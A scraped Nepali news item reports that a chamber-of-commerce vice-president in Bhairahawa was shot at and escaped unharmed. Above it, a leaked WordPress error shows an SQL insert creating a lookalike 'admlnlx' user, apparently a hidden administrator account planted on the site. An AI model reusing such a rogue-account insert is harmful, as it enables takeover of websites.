WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BtUYmTOXEBHt2iotpjai0.r0jKX7Ex1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 02:24:03', '', 'admlnlx', 'admlnlx')
बुटवल,मंसिर २१-
सिद्धार्थ उद्योग वाणिज्य संघ सिद्धार्थनगरका उपाध्यक्ष कुल प्रसाद न्यौपानेमाथि केही वेर अगाडि गोलि प्रहार भएको छ । गल्लामण्डी स्थित आफ्नै व्यवसायीक प्रतिष्ठानमा बसिरहेको समयमा मोटर साईकलमा आएका अज्ञात समुहबाट न्यौपाने माथि गोली प्रहार भएको थियो । गोलि छलिएकोले उहां सुरक्षित रहेको जिल्ला प्रहरी कार्यालयका डिएसपी वेल बहादुर पाण्डेले जानकारी दिनुभएको छ । घटनाको बारेमा थप अनुसन्धान भईरहेको पनि प्रहरीले जनाएको छ । उनी दिनभर सिमांकनबिरुद्धको आन्दोलनमा सहभागि थिए ।